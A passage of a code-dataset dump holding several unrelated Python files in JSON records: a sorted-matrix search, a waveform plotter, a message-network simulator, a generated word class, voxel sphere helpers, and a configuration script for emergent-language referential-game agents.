matrix, target):\n \"\"\"\n :type matrix: List[List[int]]\n :type target: 
int\n :rtype: bool\n \"\"\"\n if len(matrix)==0:\n return False\n m=len(matrix)\n n=len(matrix[0])\n i=0\n j=n-1;\n while(i<m and j>=0):\n if matrix[i][j]==target:\n return True\n # if greater than you should move to smaller element in that list\n elif matrix[i][j]> target:\n j-=1\n else:\n i+=1\n return False\n \n \n \n \n ","sub_path":"Problem3.py","file_name":"Problem3.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"457764157","text":"import random\nfrom PIL import Image, ImageDraw\nfrom . import interpolation\n\ndef waveform(sound, filename=None, width=400, height=300, stroke=3, upsample_mult=5, upsample_x=20, show_axis=True):\n width *= upsample_mult\n height *= upsample_mult\n\n if filename is None:\n filename = 'waveform.png'\n\n x = range(width*upsample_x)\n\n img = Image.new('RGBA', (width, height), (255, 255, 255, 0))\n draw = ImageDraw.Draw(img)\n\n for channel in range(sound.channels):\n color = tuple([random.randint(0, 200) for _ in range(3)] + [200])\n points = [ sound[i][channel] for i in range(len(sound)) ]\n points = interpolation.linear(points, width*upsample_x)\n\n mapped_points = []\n for pos, point in zip(x, points):\n y = int(((point + 1) / 2) * (height - (stroke * 2)) + stroke)\n pos /= upsample_x\n mapped_points += [ (pos, y) ]\n #draw.ellipse((pos-stroke, y-stroke, pos+stroke, y+stroke), fill=color)\n draw.line(mapped_points, fill=color, width=stroke)\n\n if show_axis:\n draw.line((0, height/2, width, height/2), fill=(0,0,0,255), width=stroke//4)\n\n img.thumbnail((width//upsample_mult, height//upsample_mult))\n img.save(filename)\n\n","sub_path":"pippi/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"230902608","text":"import random\nimport pickle\nfrom node2 import *\nfrom message2 import *\nfrom constants import *\n\nclass Network(object):\n def __init__(self):\n self.nodes = [] #list of nodes in network\n # self.epoch_it = 0 #keeps track of current Tau\n self.message_num = 0 #keeps track of available message ID numbers\n\n def add_node(self, node): #add node to network\n node.netID = len(self.nodes)\n self.nodes.append(node)\n\n def fill_network(self, num_nodes): #quickly fill network and randomly place nodes\n for i in range(num_nodes): #create and add nodes to network\n ide = str(i)\n node = Node(ide)\n node.load_pkl()\n self.add_node(node)\n\n def find_avg_energy_consumption(self, time):\n total_energy = 0\n\n for node in self.nodes:\n total_energy += node.energy\n\n avg_energy = total_energy / V\n\n f = open(path_to_folder + consumedEnergyFile, 'a')\n f.write(str(time) + \"\\t\" + str(avg_energy) + \"\\n\")\n f.close()\n\n def network_status(self): #console output for debugging (prints all messages in each nodes buffer)\n for i in range(len(self.nodes)):\n self.nodes[i].print_buf()\n print(\" \")\n\n #Get message size, path, spectrum info for the current message\n def get_message_info(self, path_lines, spec_lines, src, des, t, size):\n # print(\"Inside: \", src, des, t)\n path = []\n band = []\n for ind in range(len(path_lines)): # read each line from file to see if a new message needs to be generated\n path_line = path_lines[ind].strip()\n path_line_arr = path_line.split(\"\\t\")\n\n spec_line = spec_lines[ind].strip()\n spec_line_arr = spec_line.split(\"\\t\")\n\n if int(path_line_arr[2]) == int(t) and int(path_line_arr[0]) == int(src) 
and int(path_line_arr[1]) == int(\n des) and int(path_line_arr[3]) == int(size):\n # print (path_line_arr)\n path = path_line_arr[5: len(path_line_arr) - 1]\n band = spec_line_arr[5:]\n\n # print (path, band)\n return path, band\n\n\n def network_GO(self, t, specBW, path_lines, spec_lines, msg_lines, LINK_EXISTS): #function that sends all messages at a given tau\n\n if t % 15 == 0 or t == T - 1:\n self.find_avg_energy_consumption(t)\n\n for msg_id in range(len(msg_lines)):\n msg_line = msg_lines[msg_id].strip()\n msg_line_arr = msg_line.split(\"\\t\")\n\n if (int(msg_line_arr[5]) == t): # if a new message needs to be generated at this time\n # print(msg_line_arr)\n id = msg_line_arr[0]\n src = msg_line_arr[1] # get information from that line\n des = msg_line_arr[2]\n TTL = msg_line_arr[3]\n size = msg_line_arr[4]\n\n path, band = self.get_message_info(path_lines, spec_lines, src, des, t, size)\n\n message = Message(src, des, t, id, TTL, size, path, band, 0, 0, 0) # create the message\n curr = int(message.curr)\n\n # If a path exists for this message\n if len(message.path) > 0:\n # if len(message.path) + t >= 90:\n # print(\"Error 1: \", \" ID \", id, \" src: \", src, \" des: \", des, \" t \", t)\n\n self.nodes[curr].buf.append(message) # put the message in the source nodes buffer\n self.nodes[curr].buf_size += 1\n self.message_num += 1\n\n # else:\n # print(\"Error 2: \", \" ID \", id, \" src: \", src, \" des: \", des, \" t \", t)\n # print(\"Network Status -- Time: \", t) #console output for debugging\n # self.network_status()\n\n for i in range(len(self.nodes)): #send all messages to their next hop\n node = self.nodes[i]\n isVisited = len(node.buf) #Get the initial buffer size\n\n while len(node.buf) > 0 and isVisited > 0:\n msg = node.buf[ isVisited - 1]\n if msg.ID == debug_message:\n print(\"Curr:\", msg.curr, \"Path:\", msg.path)\n node.send_message( self, msg, t, specBW, LINK_EXISTS)\n # the message gets deleted from the current node, and buffer gets shrinked\n # isVisited is to get to the end of the node buffer even if it is not empty\n isVisited -= 1\n\n\n\n\n\n","sub_path":"X-CHANTS_UMass/network3.py","file_name":"network3.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"9148677","text":"\n\n#calss header\nclass _MAINLAND():\n\tdef __init__(self,): \n\t\tself.name = \"MAINLAND\"\n\t\tself.definitions = [u'the main part of a country or continent, not including the islands around it: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_mainland.py","file_name":"_mainland.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"337640372","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/gentex/sphere.py\n# Compiled at: 2019-10-04 13:17:54\n# Size of source mod 2**32: 3837 bytes\n\n\ndef circle_in(xm, ym, r):\n circ = []\n x = -r\n y = 0\n err = 2 - 2 * r\n while x < 0:\n for i in range(-1, x - 1, -1):\n circ.append([xm - i, ym + y])\n circ.append([xm - y, ym - i])\n circ.append([xm + i, ym - y])\n circ.append([xm + y, ym + i])\n\n r = err\n if r > x:\n x += 
1\n err += x * 2 + 1\n if r <= y:\n y += 1\n err += y * 2 + 1\n\n return circ\n\n\ndef bres_circle(xm, ym, r):\n circ = []\n x = -r\n y = 0\n err = 2 - 2 * r\n while x < 0:\n circ.append([xm - x, ym + y])\n circ.append([xm - y, ym - x])\n circ.append([xm + x, ym - y])\n circ.append([xm + y, ym + x])\n r = err\n if r > x:\n x += 1\n err += x * 2 + 1\n if r <= y:\n y += 1\n err += y * 2 + 1\n\n return circ\n\n\ndef rem_dup(mylist):\n if mylist:\n mylist.sort()\n last = mylist[(-1)]\n for i in range(len(mylist) - 2, -1, -1):\n if last == mylist[i]:\n del mylist[i]\n else:\n last = mylist[i]\n\n return mylist\n\n\ndef get_radii(r):\n zero_circle = bres_circle(0, 0, r)\n radii = []\n if r > 1:\n for step in range(r + 1):\n for zc in zero_circle:\n if zc[0] == step and zc[1] > 0:\n radii.append(zc[1])\n\n else:\n radii = [\n 1, 0]\n return radii\n\n\ndef sphere_shell(xm, ym, zm, r):\n shell = []\n radii = get_radii(r)\n for z in range(len(radii) - 1):\n circ = bres_circle(xm, ym, radii[z])\n for ci in circ:\n withzp = ci + [z + zm]\n shell.append(withzp)\n if z > 0:\n withzm = ci + [zm - z]\n shell.append(withzm)\n\n for x in range(-radii[r], radii[r] + 1):\n for y in range(-radii[r], radii[r] + 1):\n shell.append([x + xm, y + ym, r + zm])\n shell.append([x + xm, y + ym, zm - r])\n\n return shell\n\n\ndef sphere(xm, ym, zm, r):\n sphere = []\n r2 = r * r\n for x in range(r):\n for y in range(r):\n for z in range(r):\n if x > 0:\n x2 = x * x\n else:\n x2 = 0\n if y > 0:\n y2 = y * y\n else:\n y2 = 0\n if z > 0:\n z2 = z * z\n else:\n z2 = 0\n if x2 + y2 + z2 < r2:\n sphere.append([x + xm, y + ym, z + zm])\n if x > 0:\n sphere.append([-x + xm, y + ym, z + zm])\n if y > 0:\n sphere.append([x + xm, -y + ym, z + zm])\n if x > 0:\n sphere.append([-x + xm, -y + ym, z + zm])\n if z > 0:\n sphere.append([x + xm, y + ym, -z + zm])\n if x > 0:\n sphere.append([-x + xm, y + ym, -z + zm])\n if y > 0:\n sphere.append([x + xm, -y + ym, -z + zm])\n if x > 0:\n sphere.append([-x + xm, -y + ym, -z + zm])\n\n return sphere","sub_path":"pycfiles/gentex-0.1.2-py3.7-linux-x86_64/sphere.cpython-37.py","file_name":"sphere.cpython-37.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"121528004","text":"import sys\nimport random\nimport numpy as np \nimport argparse \nimport copy\n\nimport ReferentialGym\n\nimport torch\nimport torch.nn as nn \nimport torch.nn.functional as F \n\nimport torchvision\nimport torchvision.transforms as T \n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"LSTM VAE Agents: ST-GS Language Emergence.\")\n parser.add_argument(\"--seed\", type=int, default=0)\n parser.add_argument(\"--parent_folder\", type=str, help=\"folder to save into.\",default=\"\")\n parser.add_argument(\"--symbolic\", action=\"store_true\", default=False)\n parser.add_argument(\"--use_cuda\", action=\"store_true\", default=False)\n parser.add_argument(\"--dataset\", type=str, \n choices=[\"Sort-of-CLEVR\",\n \"tiny-Sort-of-CLEVR\",\n \"XSort-of-CLEVR\",\n \"tiny-XSort-of-CLEVR\",\n \"dSprites\",\n ], \n help=\"dataset to train on.\",\n default=\"dSprites\")\n parser.add_argument(\"--arch\", type=str, \n choices=[\"CNN\",\n \"CNN3x3\",\n \"BN+CNN\",\n \"BN+CNN3x3\",\n \"BN+BetaVAE3x3\",\n \"BN+Coord2CNN3x3\",\n \"BN+Coord4CNN3x3\",\n ], \n help=\"model architecture to train\",\n default=\"BN+BetaVAE3x3\")\n parser.add_argument(\"--graphtype\", type=str,\n choices=[\"straight_through_gumbel_softmax\",\n 
\"reinforce\",\n \"baseline_reduced_reinforce\",\n \"normalized_reinforce\",\n \"baseline_reduced_normalized_reinforce\",\n \"max_entr_reinforce\",\n \"baseline_reduced_normalized_max_entr_reinforce\",\n \"argmax_reinforce\",\n \"obverter\"],\n help=\"type of graph to use during training of the speaker and listener.\",\n default=\"straight_through_gumbel_softmax\")\n parser.add_argument(\"--max_sentence_length\", type=int, default=20)\n parser.add_argument(\"--vocab_size\", type=int, default=100)\n parser.add_argument(\"--optimizer_type\", type=str, \n choices=[\n \"adam\",\n \"sgd\"\n ],\n default=\"adam\")\n parser.add_argument(\"--agent_loss_type\", type=str,\n choices=[\n \"Hinge\",\n \"NLL\",\n \"CE\",\n \"BCE\",\n ],\n default=\"Hinge\")\n parser.add_argument(\"--agent_type\", type=str,\n choices=[\n \"Baseline\",\n ],\n default=\"Baseline\")\n parser.add_argument(\"--rnn_type\", type=str,\n choices=[\n \"LSTM\",\n \"GRU\",\n ],\n default=\"LSTM\")\n parser.add_argument(\"--lr\", type=float, default=1e-4)\n parser.add_argument(\"--epoch\", type=int, default=1875)\n parser.add_argument(\"--metric_epoch_period\", type=int, default=20)\n parser.add_argument(\"--dataloader_num_worker\", type=int, default=4)\n parser.add_argument(\"--metric_fast\", action=\"store_true\", default=False)\n parser.add_argument(\"--batch_size\", type=int, default=8)\n parser.add_argument(\"--mini_batch_size\", type=int, default=128)\n parser.add_argument(\"--dropout_prob\", type=float, default=0.0)\n parser.add_argument(\"--emb_dropout_prob\", type=float, default=0.8)\n parser.add_argument(\"--nbr_experience_repetition\", type=int, default=1)\n parser.add_argument(\"--nbr_train_dataset_repetition\", type=int, default=1)\n parser.add_argument(\"--nbr_test_dataset_repetition\", type=int, default=1)\n parser.add_argument(\"--nbr_test_distractors\", type=int, default=63)\n parser.add_argument(\"--nbr_train_distractors\", type=int, default=47)\n parser.add_argument(\"--resizeDim\", default=32, type=int,help=\"input image resize\")\n #TODO: make sure it is understood....!\n parser.add_argument(\"--shared_architecture\", action=\"store_true\", default=True)\n parser.add_argument(\"--with_baseline\", action=\"store_true\", default=False)\n parser.add_argument(\"--homoscedastic_multitasks_loss\", action=\"store_true\", default=False)\n parser.add_argument(\"--use_curriculum_nbr_distractors\", action=\"store_true\", default=False)\n parser.add_argument(\"--use_feat_converter\", action=\"store_true\", default=False)\n parser.add_argument(\"--descriptive\", action=\"store_true\", default=False)\n parser.add_argument(\"--descriptive_ratio\", type=float, default=0.0)\n parser.add_argument(\"--egocentric\", action=\"store_true\", default=False)\n parser.add_argument(\"--distractor_sampling\", type=str,\n choices=[ \"uniform\",\n \"similarity-0.98\",\n \"similarity-0.90\",\n \"similarity-0.75\",\n ],\n default=\"uniform\")\n # Obverter Hyperparameters:\n parser.add_argument(\"--use_sentences_one_hot_vectors\", action=\"store_true\", default=False)\n parser.add_argument(\"--differentiable\", action=\"store_true\", default=False)\n parser.add_argument(\"--obverter_threshold_to_stop_message_generation\", type=float, default=0.95)\n parser.add_argument(\"--obverter_nbr_games_per_round\", type=int, default=4)\n # Cultural Bottleneck:\n parser.add_argument(\"--iterated_learning_scheme\", action=\"store_true\", default=False)\n parser.add_argument(\"--iterated_learning_period\", type=int, default=4)\n 
parser.add_argument(\"--iterated_learning_rehearse_MDL\", action=\"store_true\", default=False)\n parser.add_argument(\"--iterated_learning_rehearse_MDL_factor\", type=float, default=1.0)\n \n # Dataset Hyperparameters:\n parser.add_argument(\"--train_test_split_strategy\", type=str, \n choices=[\"combinatorial2-Y-2-8-X-2-8-Orientation-40-N-Scale-6-N-Shape-3-N\", # Exp : DoRGsFurtherDise interweaved split simple XY normal \n \"combinatorial2-Y-2-S8-X-2-S8-Orientation-40-N-Scale-4-N-Shape-1-N\",\n \"combinatorial2-Y-32-N-X-32-N-Orientation-5-S4-Scale-1-S3-Shape-3-N\", #Sparse 2 Attributes: Orient.+Scale 64 imgs, 48 train, 16 test\n \"combinatorial2-Y-2-S8-X-2-S8-Orientation-40-N-Scale-6-N-Shape-3-N\", # 4x Denser 2 Attributes: 256 imgs, 192 train, 64 test,\n \n # Heart shape: interpolation:\n \"combinatorial2-Y-4-2-X-4-2-Orientation-40-N-Scale-6-N-Shape-3-N\", #Sparse 2 Attributes: X+Y 64 imgs, 48 train, 16 test\n \"combinatorial2-Y-2-2-X-2-2-Orientation-40-N-Scale-6-N-Shape-3-N\", #Dense 2 Attributes: X+Y 256 imgs, 192 train, 64 test\n \"combinatorial2-Y-8-2-X-8-2-Orientation-10-2-Scale-1-2-Shape-3-N\", #COMB2:Sparser 4 Attributes: 264 test / 120 train\n \"combinatorial2-Y-4-2-X-4-2-Orientation-5-2-Scale-1-2-Shape-3-N\", #COMB2:Sparse 4 Attributes: 2112 test / 960 train\n \"combinatorial2-Y-2-2-X-2-2-Orientation-2-2-Scale-1-2-Shape-3-N\", #COMB2:Dense 4 Attributes: ? test / ? train\n \"combinatorial2-Y-4-2-X-4-2-Orientation-5-2-Scale-6-N-Shape-3-N\", #COMB2 Sparse: 3 Attributes: XYOrientation 256 test / 256 train\n # Heart shape: Extrapolation:\n \"combinatorial2-Y-4-S4-X-4-S4-Orientation-40-N-Scale-6-N-Shape-3-N\", #Sparse 2 Attributes: X+Y 64 imgs, 48 train, 16 test\n \"combinatorial2-Y-8-S2-X-8-S2-Orientation-10-S2-Scale-1-S3-Shape-3-N\", #COMB2:Sparser 4 Attributes: 264 test / 120 train\n \"combinatorial2-Y-4-S4-X-4-S4-Orientation-5-S4-Scale-1-S3-Shape-3-N\", #COMB2:Sparse 4 Attributes: 2112 test / 960 train\n \"combinatorial2-Y-2-S8-X-2-S8-Orientation-2-S10-Scale-1-S3-Shape-3-N\", #COMB2:Dense 4 Attributes: ? test / ? train\n \"combinatorial2-Y-4-S4-X-4-S4-Orientation-5-S4-Scale-6-N-Shape-3-N\", #COMB2 Sparse: 3 Attributes: XYOrientation 256 test / 256 train\n\n # Ovale shape:\n \"combinatorial2-Y-1-S16-X-1-S16-Orientation-40-N-Scale-6-N-Shape-2-N\", # Denser 2 Attributes X+Y X 16/ Y 16/ --> 256 test / 768 train \n \"combinatorial2-Y-8-S2-X-8-S2-Orientation-10-S2-Scale-1-S3-Shape-2-N\", #COMB2:Sparser 4 Attributes: 264 test / 120 train\n \"combinatorial2-Y-4-S4-X-4-S4-Orientation-5-S4-Scale-1-S3-Shape-2-N\", #COMB2:Sparse 4 Attributes: 2112 test / 960 train\n \"combinatorial2-Y-2-S8-X-2-S8-Orientation-2-S10-Scale-1-S3-Shape-2-N\", #COMB2:Dense 4 Attributes: ? test / ? train\n \n #3 Attributes: denser 2 attributes(X+Y) with the sample size of Dense 4 attributes:\n \"combinatorial2-Y-1-S16-X-1-S16-Orientation-2-S10-Scale-6-N-Shape-2-N\", \n \n \"combinatorial4-Y-4-S4-X-4-S4-Orientation-5-S4-Scale-1-S3-Shape-3-N\", #Sparse 4 Attributes: 192 test / 1344 train\n ],\n help=\"train/test split strategy\",\n # INTER:\n #default=\"combinatorial2-Y-4-2-X-4-2-Orientation-40-N-Scale-6-N-Shape-3-N\")\n # EXTRA:\n #default=\"combinatorial2-Y-4-S4-X-4-S4-Orientation-40-N-Scale-6-N-Shape-3-N\")\n # EXTRA-3:\n default=\"combinatorial2-Y-4-S4-X-4-S4-Orientation-5-S4-Scale-6-N-Shape-3-N\")\n parser.add_argument(\"--fast\", action=\"store_true\", default=False, \n help=\"Disable the deterministic CuDNN. 
It is likely to make the computation faster.\")\n \n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n # VAE Hyperparameters:\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n parser.add_argument(\"--vae_detached_featout\", action=\"store_true\", default=False)\n\n parser.add_argument(\"--vae_lambda\", type=float, default=1.0)\n parser.add_argument(\"--vae_use_mu_value\", action=\"store_true\", default=False)\n \n parser.add_argument(\"--vae_nbr_latent_dim\", type=int, default=32)\n parser.add_argument(\"--vae_decoder_nbr_layer\", type=int, default=3)\n parser.add_argument(\"--vae_decoder_conv_dim\", type=int, default=32)\n \n parser.add_argument(\"--vae_gaussian\", action=\"store_true\", default=False)\n parser.add_argument(\"--vae_gaussian_sigma\", type=float, default=0.25)\n \n parser.add_argument(\"--vae_beta\", type=float, default=1.0)\n parser.add_argument(\"--vae_factor_gamma\", type=float, default=0.0)\n \n parser.add_argument(\"--vae_constrained_encoding\", action=\"store_true\", default=False)\n parser.add_argument(\"--vae_max_capacity\", type=float, default=1e3)\n parser.add_argument(\"--vae_nbr_epoch_till_max_capacity\", type=int, default=10)\n\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n \n \n args = parser.parse_args()\n print(args)\n\n gaussian = args.vae_gaussian \n vae_observation_sigma = args.vae_gaussian_sigma\n \n vae_beta = args.vae_beta \n factor_vae_gamma = args.vae_factor_gamma\n \n vae_constrainedEncoding = args.vae_constrained_encoding\n maxCap = args.vae_max_capacity #1e2\n nbrepochtillmaxcap = args.vae_nbr_epoch_till_max_capacity\n\n monet_gamma = 5e-1\n \n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n \n seed = args.seed \n\n # Following: https://pytorch.org/docs/stable/notes/randomness.html\n torch.manual_seed(seed)\n if hasattr(torch.backends, \"cudnn\") and not(args.fast):\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n np.random.seed(seed)\n random.seed(seed)\n # # Hyperparameters:\n\n nbr_epoch = args.epoch\n \n cnn_feature_size = -1 #600 #128 #256 #\n # Except for VAEs...!\n \n stimulus_resize_dim = args.resizeDim #64 #28\n \n normalize_rgb_values = False \n \n rgb_scaler = 1.0 #255.0\n from ReferentialGym.datasets.utils import ResizeNormalize\n transform = ResizeNormalize(size=stimulus_resize_dim, \n normalize_rgb_values=normalize_rgb_values,\n rgb_scaler=rgb_scaler)\n\n from ReferentialGym.datasets.utils import AddEgocentricInvariance\n ego_inv_transform = AddEgocentricInvariance()\n\n transform_degrees = 25\n transform_translate = (0.0625, 0.0625)\n\n default_descriptive_ratio = 1-(1/(args.nbr_train_distractors+2))\n # Default: 1-(1/(nbr_distractors+2)), \n # otherwise the agent find the local minimum\n # where it only predicts \"no-target\"...\n if args.descriptive_ratio 
<=0.001:\n descriptive_ratio = default_descriptive_ratio\n else:\n descriptive_ratio = args.descriptive_ratio\n\n rg_config = {\n \"observability\": \"partial\",\n \"max_sentence_length\": args.max_sentence_length,\n \"nbr_communication_round\": 1,\n \"nbr_distractors\": {\"train\":args.nbr_train_distractors, \"test\":args.nbr_test_distractors},\n \"distractor_sampling\": args.distractor_sampling,\n # Default: use \"similarity-0.5\"\n # otherwise the emerging language \n # will have very high ambiguity...\n # Speakers find the strategy of uttering\n # a word that is relevant to the class/label\n # of the target, seemingly. \n \n \"descriptive\": args.descriptive,\n \"descriptive_target_ratio\": descriptive_ratio,\n\n \"object_centric\": False,\n \"nbr_stimulus\": 1,\n\n \"graphtype\": args.graphtype,\n \"tau0\": 0.2,\n \"gumbel_softmax_eps\": 1e-6,\n \"vocab_size\": args.vocab_size,\n \"symbol_embedding_size\": 256, #64\n\n \"agent_architecture\": args.arch, #\"CoordResNet18AvgPooled-2\", #\"BetaVAE\", #\"ParallelMONet\", #\"BetaVAE\", #\"CNN[-MHDPA]\"/\"[pretrained-]ResNet18[-MHDPA]-2\"\n \"agent_learning\": \"learning\", #\"transfer_learning\" : CNN\"s outputs are detached from the graph...\n \"agent_loss_type\": args.agent_loss_type, #\"NLL\"\n\n \"cultural_pressure_it_period\": None,\n \"cultural_speaker_substrate_size\": 1,\n \"cultural_listener_substrate_size\": 1,\n \"cultural_reset_strategy\": \"oldestL\", # \"uniformSL\" #\"meta-oldestL-SGD\"\n \"cultural_reset_meta_learning_rate\": 1e-3,\n\n # Obverter\"s Cultural Bottleneck:\n \"iterated_learning_scheme\": args.iterated_learning_scheme,\n \"iterated_learning_period\": args.iterated_learning_period,\n \"iterated_learning_rehearse_MDL\": args.iterated_learning_rehearse_MDL,\n \"iterated_learning_rehearse_MDL_factor\": args.iterated_learning_rehearse_MDL_factor,\n \n \"obverter_stop_threshold\": args.obverter_threshold_to_stop_message_generation, #0.0 if not in use.\n \"obverter_nbr_games_per_round\": args.obverter_nbr_games_per_round,\n\n \"obverter_least_effort_loss\": False,\n \"obverter_least_effort_loss_weights\": [1.0 for x in range(0, 10)],\n\n \"batch_size\": args.batch_size,\n \"dataloader_num_worker\": args.dataloader_num_worker,\n \"stimulus_depth_dim\": 1 if \"dSprites\" in args.dataset else 3,\n \"stimulus_resize_dim\": stimulus_resize_dim, \n \n \"learning_rate\": args.lr, #1e-3,\n \"adam_eps\": 1e-8,\n \"dropout_prob\": args.dropout_prob,\n \"embedding_dropout_prob\": args.emb_dropout_prob,\n \n \"with_gradient_clip\": False,\n \"gradient_clip\": 1e0,\n \n \"use_homoscedastic_multitasks_loss\": args.homoscedastic_multitasks_loss,\n\n \"use_feat_converter\": args.use_feat_converter,\n\n \"use_curriculum_nbr_distractors\": args.use_curriculum_nbr_distractors,\n \"curriculum_distractors_window_size\": 25, #100,\n\n \"unsupervised_segmentation_factor\": None, #1e5\n \"nbr_experience_repetition\": args.nbr_experience_repetition,\n \n \"with_utterance_penalization\": False,\n \"with_utterance_promotion\": False,\n \"utterance_oov_prob\": 0.5, # Expected penalty of observing out-of-vocabulary words. 
\n # The greater this value, the greater the loss/cost.\n \"utterance_factor\": 1e-2,\n\n \"with_speaker_entropy_regularization\": False,\n \"with_listener_entropy_regularization\": False,\n \"entropy_regularization_factor\": -1e-2,\n\n \"with_mdl_principle\": False,\n \"mdl_principle_factor\": 5e-2,\n\n \"with_weight_maxl1_loss\": False,\n\n \"use_cuda\": args.use_cuda,\n \n \"train_transform\": transform,\n \"test_transform\": transform,\n }\n\n if args.egocentric:\n rg_config[\"train_transform\"]= T.Compose(\n [\n ego_inv_transform,\n T.RandomAffine(degrees=transform_degrees, \n translate=transform_translate, \n scale=None, \n shear=None, \n resample=False, \n fillcolor=0),\n transform\n ]\n )\n rg_config[\"test_transform\"]= T.Compose(\n [\n ego_inv_transform,\n T.RandomAffine(degrees=transform_degrees, \n translate=transform_translate, \n scale=None, \n shear=None, \n resample=False, \n fillcolor=0),\n transform\n ]\n )\n \n ## Train set:\n train_split_strategy = args.train_test_split_strategy\n test_split_strategy = train_split_strategy\n \n ## Agent Configuration:\n agent_config = copy.deepcopy(rg_config)\n agent_config[\"use_cuda\"] = rg_config[\"use_cuda\"]\n agent_config[\"homoscedastic_multitasks_loss\"] = rg_config[\"use_homoscedastic_multitasks_loss\"]\n agent_config[\"use_feat_converter\"] = rg_config[\"use_feat_converter\"]\n agent_config[\"max_sentence_length\"] = rg_config[\"max_sentence_length\"]\n agent_config[\"nbr_distractors\"] = rg_config[\"nbr_distractors\"][\"train\"] if rg_config[\"observability\"] == \"full\" else 0\n agent_config[\"nbr_stimulus\"] = rg_config[\"nbr_stimulus\"]\n agent_config[\"nbr_communication_round\"] = rg_config[\"nbr_communication_round\"]\n agent_config[\"descriptive\"] = rg_config[\"descriptive\"]\n agent_config[\"gumbel_softmax_eps\"] = rg_config[\"gumbel_softmax_eps\"]\n agent_config[\"agent_learning\"] = rg_config[\"agent_learning\"]\n\n # Obverter:\n agent_config[\"use_obverter_threshold_to_stop_message_generation\"] = args.obverter_threshold_to_stop_message_generation\n \n agent_config[\"symbol_embedding_size\"] = rg_config[\"symbol_embedding_size\"]\n\n # Recurrent Convolutional Architecture:\n agent_config[\"architecture\"] = rg_config[\"agent_architecture\"]\n agent_config[\"decoder_architecture\"] = \"DCNN\"\n if args.symbolic:\n agent_config[\"decoder_architecture\"] = \"BN+MLP\"\n \n agent_config[\"dropout_prob\"] = rg_config[\"dropout_prob\"]\n agent_config[\"embedding_dropout_prob\"] = rg_config[\"embedding_dropout_prob\"]\n \n if \"BetaVAE\" in agent_config[\"architecture\"]:\n agent_config['VAE_lambda'] = args.vae_lambda\n agent_config['vae_beta'] = args.vae_beta\n agent_config['factor_vae_gamma'] = args.vae_factor_gamma\n agent_config['vae_constrainedEncoding'] = args.vae_constrained_encoding\n agent_config['vae_use_gaussian_observation_model'] = args.vae_gaussian \n agent_config['vae_observation_sigma'] = args.vae_gaussian_sigma\n agent_config['vae_max_capacity'] = args.vae_max_capacity #1e2\n agent_config['vae_nbr_epoch_till_max_capacity'] = args.vae_nbr_epoch_till_max_capacity\n\n agent_config['vae_decoder_conv_dim'] = args.vae_decoder_conv_dim\n agent_config['vae_decoder_nbr_layer'] = args.vae_decoder_nbr_layer\n agent_config['vae_nbr_latent_dim'] = args.vae_nbr_latent_dim\n agent_config['vae_detached_featout'] = args.vae_detached_featout\n agent_config['vae_use_mu_value'] = args.vae_use_mu_value\n\n rg_config[\"use_feat_converter\"] = False\n agent_config[\"use_feat_converter\"] = False\n \n if \"BN\" in args.arch:\n 
agent_config[\"cnn_encoder_channels\"] = [\"BN32\",\"BN32\",\"BN64\",\"BN64\"]\n else:\n agent_config[\"cnn_encoder_channels\"] = [32,32,64,64]\n \n if \"3x3\" in agent_config[\"architecture\"]:\n agent_config[\"cnn_encoder_kernels\"] = [3,3,3,3]\n elif \"7x4x4x3\" in agent_config[\"architecture\"]:\n agent_config[\"cnn_encoder_kernels\"] = [7,4,4,3]\n else:\n agent_config[\"cnn_encoder_kernels\"] = [4,4,4,4]\n agent_config[\"cnn_encoder_strides\"] = [2,2,2,2]\n agent_config[\"cnn_encoder_paddings\"] = [1,1,1,1]\n agent_config[\"cnn_encoder_fc_hidden_units\"] = []#[128,] \n # the last FC layer is provided by the cnn_encoder_feature_dim parameter below...\n \n # For a fair comparison between CNN an VAEs:\n agent_config[\"cnn_encoder_feature_dim\"] = args.vae_nbr_latent_dim\n #agent_config[\"cnn_encoder_feature_dim\"] = cnn_feature_size\n # N.B.: if cnn_encoder_fc_hidden_units is [],\n # then this last parameter does not matter.\n # The cnn encoder is not topped by a FC network.\n\n agent_config[\"cnn_encoder_mini_batch_size\"] = args.mini_batch_size\n #agent_config[\"feat_converter_output_size\"] = cnn_feature_size\n agent_config[\"feat_converter_output_size\"] = 256\n\n if \"MHDPA\" in agent_config[\"architecture\"]:\n agent_config[\"mhdpa_nbr_head\"] = 4\n agent_config[\"mhdpa_nbr_rec_update\"] = 1\n agent_config[\"mhdpa_nbr_mlp_unit\"] = 256\n agent_config[\"mhdpa_interaction_dim\"] = 128\n\n agent_config[\"temporal_encoder_nbr_hidden_units\"] = 0\n agent_config[\"temporal_encoder_nbr_rnn_layers\"] = 0\n agent_config[\"temporal_encoder_mini_batch_size\"] = args.mini_batch_size\n agent_config[\"symbol_processing_nbr_hidden_units\"] = agent_config[\"temporal_encoder_nbr_hidden_units\"]\n agent_config[\"symbol_processing_nbr_rnn_layers\"] = 1\n\n ## Decoder:\n ### CNN:\n if \"BN\" in agent_config[\"decoder_architecture\"]:\n agent_config[\"cnn_decoder_channels\"] = 